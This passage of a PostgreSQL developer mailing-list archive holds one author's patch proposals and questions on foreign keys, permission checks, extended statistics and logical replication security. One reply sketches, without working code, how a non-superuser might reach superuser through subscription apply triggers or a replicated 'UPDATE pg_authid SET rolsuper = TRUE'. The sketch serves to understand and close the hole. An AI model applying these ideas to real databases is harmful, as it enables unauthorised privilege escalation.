https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/postmaster/postmaster.c;h=7de27ee4e0171863faca2f24d62488b773a7636e;hb=HEAD#l2154

[2]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/hba.c;h=371dccb852fd5c0775c7ebd82b67de3f20dc70af;hb=HEAD#l640

[3]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/auth.c;h=545635f41a916c740aacd6a8b68672d10378b7ab;hb=HEAD#l420

[4]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/auth.c;h=545635f41a916c740aacd6a8b68672d10378b7ab;hb=HEAD#l487


pg_hba_conf_error_message_patch_v00.diff
Description: Binary data


Re: Why does creating logical replication subscriptions require superuser?

2021-01-22 Thread Paul Martinez
> We successfully created exploits against Aiven and AWS RDS services gaining
> superuser with their ways of subscription creation (and reported
> vulnerabilities, of course). Probably, you have this (not so scary)
> vulnerability too.

Can you share the rough idea of how these exploits work? What parts of the
current architecture allowed that to happen?

I read the thread regarding creating a special role for creating subscriptions,
and I think it helped me understand various aspects of the current architecture
better.

Please correct me if any of these points are incorrect:

Some of the original justifications for requiring superuser to create
subscriptions include:
- Replication inherently adds significant network traffic and extra background
  process, and we wouldn't want unprivileged users to be able to add such
  drastic load to then database.
- Subjectively, subscription is a "major" operation, so it makes sense to not
  allow every user to perform it.
- Running the apply process as a superuser drastically simplifies the number
  of possible errors that might arise due to not having sufficient permissions
  to write to target tables, and may have simplified the initial
  implementation.
- Subscriptions store plaintext passwords, which are sensitive, and we
  wouldn't want unprivileged users to see these. Only allowing superusers
  to create subscriptions and view the subconninfo column is a way to resolve
  this.

Are there any other major reasons that we require superuser? Notably one may
wonder why we didn't check for the REPLICATION attribute, but even replication
users could run into table ownership and access issues.

Unless I'm mistaken, the apply worker process runs as the user that created
the subscription. Thus, it is the requirement that only superusers can create
subscriptions that leads to two warnings in the Security documentation:

https://www.postgresql.org/docs/current/logical-replication-security.html

> The subscription apply process will run in the local database with the
> privileges of a superuser.

This is a direct consequence of requiring superuser to create subscriptions
and running the apply process as the creator. If the subscription weren't
created by a superuser, then the apply process wouldn't run as superuser
either, correct?

> A user able to modify the schema of subscriber-side tables can execute
> arbitrary code as a superuser. Limit ownership and TRIGGER privilege on such
> tables to roles that superusers trust.

I believe a theoretical exploit here would involve the unprivileged user
creating a trigger with a function defined using SECURITY INVOKER and attaching
it to a table that is a subscription target. Since the apply process is running
as superuser, this means that the trigger is invoked as superuser, leading to
the privilege escalation. More accurately, a user able to modify the schema
of subscriber-side tables could execute arbitrary code as the _creator of the
subscription_, correct?

So it seems privilege escalation to _superuser_ can be prevented by simply
making the owner of the subscription not a superuser. But this can already
happen now by simply altering the user after the subscription has been created.
I haven't tested this edge case, but I hope that Postgres doesn't crash if it
subsequently runs into a permission issue; I assume that it will simply stop
replication, which seems appropriate.


One other point:

One message in the thread mentioned somehow tricking Postgres into replicating
system catalog tables:

https://www.postgresql.org/message-id/109201553163096%40myt5-68ad52a76c91.qloud-c.yandex.net

I'm unsure whether this is allowed by default, but it doesn't seem like too
much trouble to run a modified publisher node that does allow it. Then
something like 'UPDATE pg_authid SET rolsuper = TRUE' could result in privilege
escalation on the subscriber side. But, again, if the apply process isn't
running as superuser, then presumably applying the change in the subscriber
would fail, stopping replication, and neutralizing the attack.


Thanks,
Paul




Why does creating logical replication subscriptions require superuser?

2021-01-21 Thread Paul Martinez
Hey, all,

I'm working with native logical replication, and I don't fully understand
why logical replication subscribers need to be superusers, nor do I fully
understand the implication of some of the comments made on this page:

https://www.postgresql.org/docs/current/logical-replication-security.html

> A user able to modify the schema of subscriber-side tables can execute
> arbitrary code as a superuser.

Does "execute arbitrary code" here really mean executing arbitrary code on the
machine that is running Postgres, or simply running arbitrary SQL in the
replicating database? Would it only be able to modify data in the database
containing the subscription, or could it modify other databases in the same
cluster? Is there any "blast-radius" to the capabilities gained by such a user?

According to the commit message that added this text, the callout of this
point was added as result of CVE-2020-14349, but the details there don't
really help me understand what the concern is here, nor do I have a deep
understanding of various features that might combine to create a vulnerability.

I'm not sure what arbitrary code could be executed, but my rough guess, based
on some of the other text on that page, is that custom triggers, written in
an arbitrary language (e.g., Python), would run arbitrary code and that is
the concern. Is that correct? And, if so, assuming that Python triggers were
the only way to execute arbitrary code, then simply building Postgres without
Python support would prevent users that can modify the schema from executing
code as superuser. What is the full set of features that could lead to running
arbitrary code in this scenario? Is it just all the different languages that
can be used to write triggers?

Essentially, I'm wondering what a loose proof-of-concept privilege escalation
vulnerability would look like if a non-superuser can modify the schema of
subscriber-side tables.

On a related note, what happens if a superuser creates a subscription, and then
is demoted to a regular user? My understanding is that the worker that applies
the logical changes to the database connects as the user that created the
subscription, so would that prevent potential vulnerabilities in any way?


Thanks,
Paul




[PATCH] Partial foreign key updates in referential integrity triggers

2021-01-06 Thread Paul Martinez
Hey, hackers!

I've created a patch to better support referential integrity constraints when
using composite primary and foreign keys. This patch allows creating a foreign
key using the syntax:

  FOREIGN KEY (tenant_id, fk_id) REFERENCES fktable ON DELETE SET NULL (fk_id)

which means that only the fk_id column will be set to NULL when the referenced
row is deleted, rather than both the tenant_id and fk_id columns.

In multi-tenant applications, it is common to denormalize a "tenant_id" column
across every table, and use composite primary keys of the form (tenant_id, id)
and composite foreign keys of the form (tenant_id, fk_id), reusing the
tenant_id column in both the primary and foreign key.

This is often done initially for performance reasons, but has the added benefit
of making it impossible for data from one tenant to reference data from another
tenant, also making this a good decision from a security perspective.

Unfortunately, one downside of using composite foreign keys in such a matter
is that commonly used referential actions, such as ON DELETE SET NULL, no
longer work, because Postgres tries to set all of the referencing columns to
NULL, including the columns that overlap with the primary key:


CREATE TABLE tenants (id serial PRIMARY KEY);
CREATE TABLE users (
  tenant_id int REFERENCES tenants ON DELETE CASCADE,
  id serial,
  PRIMARY KEY (tenant_id, id),
);
CREATE TABLE posts (
tenant_id int REFERENCES tenants ON DELETE CASCADE,
id serial,
author_id int,
PRIMARY KEY (tenant_id, id),
FOREIGN KEY (tenant_id, author_id) REFERENCES users ON DELETE SET NULL
);

INSERT INTO tenants VALUES (1);
INSERT INTO users VALUES (1, 101);
INSERT INTO posts VALUES (1, 201, 101);
DELETE FROM users WHERE id = 101;
ERROR:  null value in column "tenant_id" violates not-null constraint
DETAIL:  Failing row contains (null, 201, null).


This can be resolved by manually creating triggers on the referenced table, but
this is clunky and adds a significant amount of extra work when adding (or
removing!) foreign keys. Users shouldn't have to compromise on maintenance
overhead when using composite foreign keys.

I have implemented a simple extension to the syntax for foreign keys that
makes it just as easy to support referential integrity constraints for
composite foreign keys as it is for single column foreign keys. The SET NULL
and SET DEFAULT referential actions can now be optionally followed by a column
list:

key_action:
  | NO ACTION
  | RESTRICT
  | CASCADE
  | SET NULL [ (column_name [, ...] ) ]
  | SET DEFAULT [ (column_name [, ...] ) ]

When a column list is provided, only the specified columns, which must be a
subset of the referencing columns, will be updated in the associated trigger.

Note that use of SET NULL (col1, ...) on a composite foreign key with MATCH
FULL specified will still raise an error. In such a scenario we could raise an
error when the user tries to define the foreign key, but we don't raise a
similar error when a user tries to use SET NULL on a non-nullable column, so I
don't think this is critical. (I haven't added this check in my patch.) While
this feature would mostly be used with the default MATCH SIMPLE, I could
imagine using SET DEFAULT (col, ...) even for MATCH FULL foreign keys.

To store this additional data, I've added two columns to the pg_constraint
catalog entry:

confupdsetcols int2[]
confdelsetcols int2[]

These columns store the attribute numbers of the columns to update in the
ON UPDATE and ON DELETE triggers respectively. If the arrays are empty, then
all of the referencing columns should be updated.


I previously proposed this feature about a year ago [1], but I don't feel like
the arguments against it were very strong. Wanting to get more familiar with the
Postgres codebase I decided to implement the feature over this holiday break,
and I've gotten everything working and put together a complete patch including
tests and updates to documentation. Hopefully if people find it useful it can
make its way into the next commitfest!

Visual diff:
https://github.com/postgres/postgres/compare/master...PaulJuliusMartinez:on-upd-del-set-cols

Here's a rough outline of the changes:

src/backend/parser/gram.y | 122
src/include/nodes/parsenodes.h|   3
src/backend/nodes/copyfuncs.c |   2
src/backend/nodes/equalfuncs.c|   2
src/backend/nodes/outfuncs.c  |  47
- Modify grammar to add opt_column_list after SET NULL and SET DEFAULT
- Add fk_{upd,del}_set_cols fields to Constraint struct
- Add proper node support, as well as outfuncs support for AlterTableStmt,
  which I used while debugging

src/include/catalog/pg_constraint.h   |  20
src/backend/catalog/pg_constraint.c   |  80
src/include/catalog/catversion.h  |   2
- Add confupdsetcols and confdelsetcols to pg_constraint catalog entry

src/backend/commands/tablecmds.c  | 142
- Pass along data from parsed Constraint node to Creat

Re: [PATCH] Simplify permission checking logic in user.c

2020-12-30 Thread Paul Martinez
On Wed, Dec 30, 2020 at 12:28 PM Andrey Borodin  wrote:
> I think that sharing "various small changes to permission checks" is a really 
> good idea.
>
> > 30 дек. 2020 г., в 20:39, Stephen Frost  написал(а):
> > In other words, I suspect people would be happier if we
> > provided a way for non-superusers a way to create replication roles and
> > bypassrls roles.
> +1 again. I hope we will return to the topic soon.

On Wed, Dec 30, 2020 at 9:26 AM Stephen Frost  wrote:
> While I do appreciate that it'd be nice if we made all of the code in
> the backend easier for folks to maintain their own patch sets against
> core, it'd also mean that we're now being asked to provide some level of
> commitment that we aren't going to change these things later because
> then we'd break $whomever's patches.  That's certainly not something
> that is really reasonable for us to agree to.
>
> I'd strongly suggest that, instead, you consider proposing changes which
> would address the actual use cases you have and work with the community
> to have those included in core, which would further have the added
> property that everyone would then benefit from those improvements.

On Wed, Dec 30, 2020 at 9:39 AM Stephen Frost  wrote:
>
> That really strikes me as pretty darn unlikely to happen, it's not like
> this code is really spread out across very many lines or that it's hard
> to see the pretty clear pattern.
>
> In thinking about these role attributes and the restrictions we have
> about what attributes don't require superuser to set and what do, I do
> feel like we're probably missing a bet regarding replication and
> bypassrls..  In other words, I suspect people would be happier if we
> provided a way for non-superusers a way to create replication roles and
> bypassrls roles.  Exactly how we do that is a bit tricky to figure out
> but that's certainly a much more productive direction to be going in.

Thanks everyone for taking a look!

You've identified exactly the problem we're running into -- we want to
allow customers, who aren't superusers, to create replication roles.

In Google Cloud SQL we create a role for customers, cloudsqlsuperuser,
which, confusingly, is not a SUPERUSER, but does have some extra
permissions. We've modified a lot of "if (!superuser())" checks to
"if (!superuser() && !cloudsqlsuperuser())".

That was actually what I initially tried to do when modifying this bit of
code:

  if (issuperuser)
if (!superuser()) ereport(...);
  elsif (isreplication)
-   if (!superuser()) ereport(...);
+   if (!superuser() && !cloudsqlsuperuser()) ereport(...);
  elsif (bypassrls)
if (!superuser()) ereport(...);
  else
if (!have_createrole_privilege()) ereport()

But this inadvertently allowed cloudsqlsuperuser to _also_ create users
with the BYPASSRLS attribute by creating a user with both REPLICATION
and BYPASSRLS, which I only realized when a couple of tests failed.
Properly modifying the required permissions required separating the
if/else branches, which led to this patch.

>From my understanding, AWS RDS Postgres takes a slightly different approach
and allows the REPLICATION attribute to be inherited through membership in
a special rds_replication role.



We haven't seriously considered what some sort of general functionality
would look like to support our managed Postgres use-cases, but here's a
rough sketch of what we're trying to accomplish with roles and permissions:

- We, ideally, want to give our customers access to as much of Postgres'
  functionality as possible, including SUPERUSER capabilities

- But we do not want customers to have access to the underlying VM or
  filesystem

- There are certain parts of the system (i.e., certain databases, tables,
  individual rows in catalog tables, etc.) that we want to manage and we
  can't allow customers to modify these at all. Examples include:
  - Our own SUPERUSER role that we use to connect to the cluster; customers
shouldn't be able to modify this role at all
  - Replication slots used for managed replication shouldn't be able to be
modified by customers (even if they have the REPLICATION attribute)

- We want to prevent customers from depending on any data we choose to store
  in other database, as that limits our flexibility to make future changes
  - Notably this means we only can support logical replication, and not
physical replication.

I suppose this could be roughly summarized as "90% of a superuser, but also
still obeys SQL privileges for objects created by someone else".

We would definitely be happy to explore what sort of functionality like this
would be useful for others!




[PATCH] Simplify permission checking logic in user.c

2020-12-29 Thread Paul Martinez
Hey, hackers,

As part of building Postgres for a managed environment in Google Cloud SQL,
we've made various small changes to permission checks to carefully limit what
customers have access to.

We were making some changes in src/backend/commands/user.c and noticed some
clunky logic related to verifying that the current user has sufficient
permissions to perform an action:

https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/commands/user.c;h=0e6800bf3e4f3f584bbb0b2f6f8ae999f5d94bf1;hb=HEAD#l288

The checks for whether the current user can create a user with the SUPERUSER,
REPLICATION, or BYPASSRLS attributes are chained together using if/else-if,
before finally checking whether the user has CREATEROLE privileges in a
final else. This construction is error-prone, since once one branch is visited,
later ones are skipped, and it implicitly assumes that the permissions needed
for each subsequent action are subsets of the permissions needed for the
previous action. Since each branch requires SUPERUSER this is fine, but
changing one of the checks could inadvertently allow users without the
CREATEROLE permission to create users.

A similar construction is used later in the file in the AlterRole function:

https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/commands/user.c;h=0e6800bf3e4f3f584bbb0b2f6f8ae999f5d94bf1;hb=HEAD#l717

This small patch simply modifies the code to replace the if/else-if chain with
separate if statements, and always checks whether the user has the CREATEROLE
privilege. (The have_createrole_privilege function includes another superuser
check.) Given the current checks in each branch, this code is equivalent, but
easier to modify in the future.

- Paul


user-c-if-else-if.patch
Description: Binary data


Proposal: Adding isbgworker column to pg_stat_activity

2020-12-02 Thread Paul Martinez
Hey, all,

It is currently slightly difficult to determine how many background worker
processes are currently running, which is useful when trying to manage
the max_worker_processes parameter. It seems the best bet is to use the
backend_type column and filter out the many types that are defined in
miscinit.c:

https://github.com/postgres/postgres/blob/REL_13_1/src/backend/utils/init/miscinit.c#L201-L253

I would like to propose adding a simple column isbgworker, that simply
stores the value of the expression `beentry->st_backendType == B_BG_WORKER`,
which is used in pg_stat_get_activity.

https://github.com/postgres/postgres/blob/REL_13_1/src/backend/utils/adt/pgstatfuncs.c#L854-L867

Such a column would make it easier to determine a suitable value for the
max_worker_processes parameter. Similar internal resource parameters all
seem to have more straightforward ways to gauge their current usage:

max_wal_senders:
  -> COUNT(*) FROM pg_stat_replication

max_parallel_workers:
  -> COUNT(*) FROM pg_stat_activity WHERE backend_type = 'parallel worker'

max_replication_slots:
  -> COUNT(*) FROM pg_replication_slots

max_connections:
  -> COUNT(*) FROM pg_stat_activity WHERE backend_type = 'client backend'


Thoughts? I think it should be pretty easy to implement, and it would
also be beneficial to update the documentation for all of the above
parameters with notes about how to determine their current usage.


Thanks,
Paul


(Note: I asked a question related to this on pgsql-general:
https://www.postgresql.org/message-id/CACqFVBaH7OPT-smiE0xG6b_KVGkWNNhZ2-EoLNrbzLFSUgN2eQ%40mail.gmail.com
)


Proper usage of ndistinct vs. dependencies extended statistics

2019-04-10 Thread Paul Martinez
Hello,

I have some questions about the different types of extended statistics
that were introduced in Postgres 10.
- Which types of queries are each statistic type supposed to improve?
- When should one type of statistic be used over the other? Should they
  both always be used?

We have a multi-tenant application and all of our tables have a denormalized
tenant_id column. (Most tables actually use the tenant_id as part of a
composite primary key on (tenant_id, id).)

As the docs suggest, we haven't created extended STATISTICS except for when
we observe the query planner making poor query plans.

We've seen poor query plans on queries involving filters on foreign keys:

  Table: fk_table

tenant_id  | integer
id | integer
fk_id  | integer

PRIMARY KEY (tenant_id, id)
FOREIGN KEY (tenant_id, fk_id) REFERENCES left_table(tenant_id, id)

The id columns on these tables are unique, so there is a functional dependence
between fk_id and tenant_id; if the fk_id columns are the same, then the
tenant_id columns must also be the same.

This table has ~4.6 million rows, ~1300 distinct values for tenant_id, and
~13000 distinct values for fk_id.

A single SELECT query that filters on tenant_id and fk_id erroneously
estimates that it will return a single row (4,600,000 / 1300 / 13,000 ~= 0.1):

=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND
fk_id = 1;
  QUERY PLAN
--
 Index Scan using fk_table_tenant_id_fk_id_index on fk_table
   (cost=0.43..4.45 rows=1 width=44) (actual time=0.016..1.547
rows=3113 loops=1)
   Index Cond: ((tenant_id = 100) AND (fk_id = 1))

In other places we've used a ndistinct statistic to solve this issue, but that
doesn't help in this case. Postgres still estimates that the query will return
a single row.

=> CREATE STATISTICS ndistinct_stat (ndistinct) ON tenant_id, fk_id
FROM fk_table;
=> ANALYZE fk_table;
=> SELECT stxname, stxndistinct FROM pg_statistic_ext;
stxname |  stxndistinct   |
+-+
 ndistinct_stat | {"1, 3": 3433}  |
=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND
fk_id = 1;
-- (unchanged)

Why doesn't the ndistinct statistic get used when planning this query? (We're
currently on Postgre 10.6.) In contrast, if we create a functional dependency
statistic then Postgres will accurately predict the result size.

=> CREATE STATISTICS dep_stat (dependencies) ON tenant_id, fk_id FROM fk_table;
=> ANALYZE fk_table;
=> SELECT stxname, stxdependencies FROM pg_statistic_ext;
  stxname   | stxdependencies
+--
 dep_stat   | {"1 => 3": 1.00, "3 => 1": 0.060300}

=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND
fk_id = 1;
  QUERY PLAN
--
 Index Scan using fk_table_tenant_id_fk_id_index on fk_table
   (cost=0.43..1042.23 rows=612 width=44) (actual time=0.011..0.813
rows=3056 loops=1)
   Index Cond: ((tenant_id = 100) AND (fk_id = 1))

So, in general, which type of extended statistic should be used? Where do the
different kinds of statistics get used in the query planner? Is there an
advantage to using one type of statistic vs the other, or should we always
create both?

And in our specific example, with a schema designed for multi-tenancy, which
types of statistics should we use for our foreign keys, where tenant_id is
functionally dependent on the other foreign_id columns?

To explain where some of our confusion is coming from, here's the example where
adding an ndistinct statistic helped: Postgres was adding a filter after an
index scan instead of including the filter as part of the index scan.

big_table had ~500,000,000 rows,
~3000 distinct values for column a,
~3000 distinct values for column b,
but just ~4500 distinct values for the (a, b) tuple,
and column b was functionally dependent on column c.

Postgres wanted to do:

=> SELECT * FROM big_table WHERE a = 1 AND b = 10 AND c IN (100, 101, 102, ...);
Index Scan using big_table_a_b_c on big_table  (cost=0.57..122.41
rows=1 width=16)
  Index Cond: ((a = 1) AND (b = 10))
  Filter: c = ANY ('{100, 101, 102, 103, 104, 105, ...}')

But then we did:

=> CREATE STATISTICS big_table_a_b_ndistinct (ndistinct) ON a, b FROM big_table;
=> ANALYZE big_table;
=> SELECT * FROM big_table WHERE a = 1 AND b = 10 AND c IN (100, 101, 102, ...);
Index Scan using big_table_a_b_c on big_table  (cost=0.57..122.41
rows=1 width=16)
  Index Cond: ((a = 1) AND (b = 10)) AND (c = ANY ('{100, 101, 102,
103, 104, 105, ...}'))

(This had very poor performance between Postgres thought it would have to
filter 500,000,000 / 3000 / 3000 ~= 55 rows, but actually it had to filter
500,000,000 / 4500 ~= 110,000 rows.)

Because of the functional 

Re: PATCH: Include all columns in default names for foreign key constraints.

2019-03-09 Thread Paul Martinez
Thanks for the comments!

On Fri, Feb 8, 2019 at 2:11 AM Peter Eisentraut
 wrote:
>
> On 13/01/2019 01:55, Paul Martinez wrote:
> > I pretty much just copied and pasted the implementation from
> > ChooseIndexNameAddition and placed it in src/backend/commands/tablecmds.c.
>
> The use of "name2" in the comment doesn't make sense outside the context
> of indexcmds.c.  Maybe rewrite that a bit.

Updated.

> > Regression tests are in src/test/regress/sql/foreign_key.sql. I create two
> > composite foreign keys on table, one via the CREATE TABLE statement, and the
> > other in a ALTER TABLE statement. The generated names of the constraints are
> > then queried from the pg_constraint table.
>
> Existing regression tests already exercise this, and they are failing
> all over the place because of the changes of the generated names.  That
> is to be expected.  You should investigate those failures and adjust the
> "expected" files.  Then you probably don't need your additional tests.
>
> It might be worth having a test that runs into the 63-character length
> limit somehow.

Yikes, sorry about that. Some tests are failing on my machine because of dynamic
linking issues and I totally missed all the foreign key failures. I think I've
fixed all the tests. I changed the test I added to test the 63-character limit.

Attached is an updated patch.

- Paul


foreign-key-constraint-names-v2.patch
Description: Binary data


Re: [PROPOSAL] ON DELETE SET NULL () for Foreign Key Constraints

2019-01-19 Thread Paul Martinez
On Sat, Jan 19, 2019 at 5:12 PM Tom Lane  wrote:
>
> Paul Martinez  writes:
> > I have a proposal for a feature to add to Postgres. I believe it is a 
> > natural
> > extension to the current standard SQL ON DELETE SET NULL behavior when using
> > composite foreign keys. The basic idea is that you can specify which 
> > columns to
> > set to NULL in the DELETE trigger created by a foreign key constraint.
>
> This seems like kind of a kluge, because it can only work in MATCH SIMPLE
> mode, not MATCH FULL or MATCH PARTIAL.  (We don't have MATCH PARTIAL atm,
> but it's in the spec so I imagine somebody will get around to implementing
> it someday.  Anyway MATCH FULL is there now.)  In the latter two modes,
> setting a subset of the referencing columns to null isn't sufficient to
> make the row pass the constraint.

I don't see why this is an issue. Currently Postgres allows you to combine
the foreign key features in non-sensical ways. For example, you can create a
not nullable column that has ON DELETE SET NULL behavior:

CREATE TABLE foo (a int PRIMARY KEY);
CREATE TABLE bar (b int NOT NULL REFERENCES foo(a) ON DELETE SET NULL);
INSERT INTO foo VALUES (1);
INSERT INTO bar VALUES (1);
DELETE FROM foo WHERE a = 1;
ERROR:  null value in column "b" violates not-null constraint

The incongruence of MATCH FULL with this feature doesn't seem like a problem.
We could raise an error when MATCH FULL and a proper subset of the constrained
columns are supplied in the SET NULL clause if we were worried about users
mis-using the feature, but we don't raise an error for the similar logic error
above. I don't entirely understand the use-cases for MATCH PARTIAL, but it
doesn't seem like combining MATCH PARTIAL with this feature would be blatantly
wrong. This feature provides a real benefit when using MATCH SIMPLE, which is
the default behavior.

There are good reasons for using denormalizing tenant_ids in a multi-tenant
application beyond just performance. It actually improves referential integrity
because it makes mixing data between tenants impossible. Consider the following
example:

-- denormalized tenant_id, but simple primary keys
CREATE TABLE tenants (id int PRIMARY KEY);
CREATE TABLE users (tenant_id int REFERENCES tenants, id int PRIMARY KEY);
CREATE TABLE messages (
  tenant_id int REFERENCES tenants,
  id int PRIMARY KEY,
  from_id int REFERENCES users,
  to_id int REFERENCES users,
  content text
);
-- Create three tenants
INSERT INTO tenants VALUES (1), (2), (3);
-- Create users in tenants 1 and 2
INSERT INTO users VALUES (1, 101), (2, 102);
-- Create message in tenant 3 sent from user in tenant 1 to user in tenant 2
INSERT INTO messages VALUES (3, 201, 101, 102, 'poor referential integrity');

If you create the users and messages tables with composite primary keys the
last query will fail:

-- composite primary keys of the form (tenant_id, id)
CREATE TABLE cpk_users (
  tenant_id int REFERENCES tenants,
  id int,
  PRIMARY KEY (tenant_id, id)
);
CREATE TABLE cpk_messages (
  tenant_id int REFERENCES tenants,
  id int,
  from_id int,
  to_id int,
  content text,
  PRIMARY KEY (tenant_id, id),
  FOREIGN KEY (tenant_id, from_id) REFERENCES cpk_users,
  FOREIGN KEY (tenant_id, to_id) REFERENCES cpk_users
);
-- Create cpk_users in tenants 1 and 2
INSERT INTO cpk_users VALUES (1, 101), (2, 102);
-- Create cpk_message in tenant 3 sent from user in tenant 1 to user in tenant 2
INSERT INTO cpk_messages VALUES (3, 201, 101, 102, 'great referential
integrity');
ERROR:  insert or update on table "cpk_messages" violates foreign key
constraint "cpk_messages_tenant_id_from_id_fkey"
DETAIL:  Key (tenant_id, from_id)=(3, 101) is not present in table "cpk_users".

So there are strong reasons in favor of using composite primary keys. Postgres
has great support for composite primary and foreign keys, but SET NULL behavior
that would have worked fine in the schema using simple primary keys no longer
works in the composite primary key schema. Users could manually implement
triggers to get the desired behavior (as I have done in the use-case that led
me to think of this feature), but it'd be great if switching to composite
primary keys didn't force the user to make compromises elsewhere.

- Paul

On Sat, Jan 19, 2019 at 5:12 PM Tom Lane  wrote:
>
> Paul Martinez  writes:
> > I have a proposal for a feature to add to Postgres. I believe it is a 
> > natural
> > extension to the current standard SQL ON DELETE SET NULL behavior when using
> > composite foreign keys. The basic idea is that you can specify which 
> > columns to
> > set to NULL in the DELETE trigger created by a foreign key constraint.
>
> This seems like kind of a kluge, because it can only work in MATCH SIMPLE
> mode, not MATCH FULL or MA

[PROPOSAL] ON DELETE SET NULL () for Foreign Key Constraints

2019-01-19 Thread Paul Martinez
Hello!

I have a proposal for a feature to add to Postgres. I believe it is a natural
extension to the current standard SQL ON DELETE SET NULL behavior when using
composite foreign keys. The basic idea is that you can specify which columns to
set to NULL in the DELETE trigger created by a foreign key constraint. (There
could be similar support for UPDATE triggers and SET DEFAULT actions.)


PROBLEM:

Consider the following basic schema:

CREATE TABLE users (id primary key);
CREATE TABLE posts (
id primary key,
content text,
author_id int REFERENCES users(id) ON DELETE SET NULL
);

When a user is deleted all of their posts will have the author_id field set to
NULL.

Consider the same schema in a multi-tenant application. In a multi-tenant
application a tenant_id column will frequently be denormalized across every
table. In certain cases these tables will actually use the tenant_id as part of
a composite primary key. (This is the approach recommended by Citus.)

So in a multi-tenant architecture, our schema may look like this:

CREATE TABLE tenants (id primary key);
CREATE TABLE users (
tenant_id int,
id int,
PRIMARY KEY (tenant_id, id)
);
CREATE TABLE posts (
tenant_id int,
id int,
content text,
author_id int,
PRIMARY KEY (tenant_id, id),
FOREIGN KEY (tenant_id, author_id)
REFERENCES users(tenant_id, id) ON DELETE SET NULL
);

In this situation we can no longer delete a user that has created a post
because Postgres would try to set both the author_id AND the tenant_id columns
of a corresponding post to NULL, and tenant_id is not nullable.

INSERT INTO tenants VALUES (1);
INSERT INTO users VALUES (1, 101);
INSERT INTO posts VALUES (1, 201, 'content', 101);
DELETE FROM users WHERE id = 101;
ERROR:  null value in column "tenant_id" violates not-null constraint
DETAIL:  Failing row contains (null, 201, content, null).


GENERAL SOLUTION:

My proposal is to allow specifying which columns to set null during the delete
trigger:

CREATE TABLE posts (
...,
FOREIGN KEY (tenant_id, author_id)
REFERENCES users(tenant_id, id) ON DELETE SET NULL (author_id)
)

If this feature is implemented the above DELETE statement would succeed, and
the record in posts would have the values (1, 201, 'content', NULL).

The grammar will be modified as follows:

table_constraint is:

  FOREIGN KEY ( column_name [, ... ] ) REFERENCES reftable [ (
refcolumn [, ... ] ) ]
  [ MATCH FULL | MATCH PARTIAL | MATCH SIMPLE ] [ ON DELETE action
] [ ON UPDATE action ] }

action is:

  NO ACTION |
  RESTRICT |
  CASCADE |
  SET DEFAULT [ ( defcolumn [, ...] ) ] |
  SET NULL [ ( nullcolumn [, ...] ) ]

This modification to the grammar makes it easy to support similary
functionality for UPDATE triggers and the SET DEFAULT action.

The columns that we want to set to null must be a subset of the columns that
make up the foreign key. From looking through the grammar it seems like this
syntax will also be supported in column constraints, and later validation could
ensure that only that constrained column appears in the column list.

To store this new information, a new field will need to be added to
pg_constraint to save which columns we're supposed to set null. Since a
constraint could have separate ON DELETE and ON UPDATE behavior, we'd need two
additional columns if both were supported.

NameTypeReferences   Description
conkey  int2[]pg_attribute.attnum   List of constrained columns
confkey int2[]pg_attribute.attnum   List of referenced columns
condeletecols   int2[]pg_attribute.attnum   List of constrained
columns to set
on deletion of referenced record
conupdatecols   int2[]pg_attribute.attnum   List of constrained
columns to set
on update of referenced record


POSSIBLE GENERALIZATIONS/EXTENSIONS:

The above solution solves the specific problem that I have been facing, but I
see two clear possibilities for how this functionality can be extended.

One, the set of columns that we set to null could be any set of columns in the
table with the constraint, rather than just a subset of columns that make up
the foreign key. This would be useful for columns that are only meaningful if
the foreign key is present. Imagine a timestamp column that indicates when the
foreign key was set and should be cleared when the foreign key is cleared. Or
maybe some columns have been denormalized from the referenced table and those
should be cleared.

While this extension is reasonable, it does add another layer of complexity to
the feature: what happens when one of those columns gets dropped from the
table? Should the entire foreign key be dropped? Should it error? Or should
that column simply be removed from the set of columns that are acted upon? If
the set of columns can only be a subset of the foreign key columns, then this
is already a solved

PATCH: Include all columns in default names for foreign key constraints.

2019-01-12 Thread Paul Martinez
Hello!

I have written a small patch to modify the default names for foreign key
constraints. Currently if the foreign key is composed of multiple columns we
only use the first one in the constraint name. This can lead to similar
constraint names when two foreign keys start with the same column. This sort
of situation may commonly occur in a multi-tenant environment.

> CREATE TABLE users (tenant_id int, id int, PRIMARY KEY (tenant_id, id));
> CREATE TABLE posts (tenant_id int, id int, PRIMARY KEY (tenant_id, id));
> CREATE TABLE comments (
tenant_id int,
id int,
post_id int,
commenter_id int,
FOREIGN KEY (tenant_id, post_id) REFERENCES posts,
FOREIGN KEY (tenant_id, commenter_id) REFERENCES users
  )
> \d comments
 Table "public.comments"

 Foreign-key constraints:
  "comments_tenant_id_fkey" FOREIGN KEY (tenant_id, commenter_id)
REFERENCES users(tenant_id, id)
  "comments_tenant_id_fkey1" FOREIGN KEY (tenant_id, post_id)
REFERENCES posts(tenant_id, id)

The two constraints have nearly identical names. With my patch the default names
will include both column names, so we have we will instead have this output:

 Foreign-key constraints:
  "comments_tenant_id_commenter_id_fkey" FOREIGN KEY (tenant_id,
commenter_id) REFERENCES users(tenant_id, id)
  "comments_tenant_id_post_id_fkey" FOREIGN KEY (tenant_id, post_id)
REFERENCES posts(tenant_id, id)

This makes the default names for foreign keys in line with the default names
for indexes. Hopefully an uncontroversial change!

The logic for creating index names is in the function ChooseIndexNameAddition
in src/backend/commands/indexcmds.c. There is also similar logic fore creating
names for statistics in ChooseExtendedStatisticNameAddition in
src/backend/commands/statscmds.c.

I pretty much just copied and pasted the implementation from
ChooseIndexNameAddition and placed it in src/backend/commands/tablecmds.c.
The new function is called ChooseForeignKeyConstraintNameAddition. I updated
the comments in indexcmds.c and statscmds.c to also reference this new function.
Each of the three versions takes in the columns in slightly different forms, so
I don't think creating a single implementation of this small bit of logic is
desirable, and I have no idea where such a util function would go.

Regression tests are in src/test/regress/sql/foreign_key.sql. I create two
composite foreign keys on table, one via the CREATE TABLE statement, and the
other in a ALTER TABLE statement. The generated names of the constraints are
then queried from the pg_constraint table.


This is my first submission to Postgres, so I'm not entirely sure what the
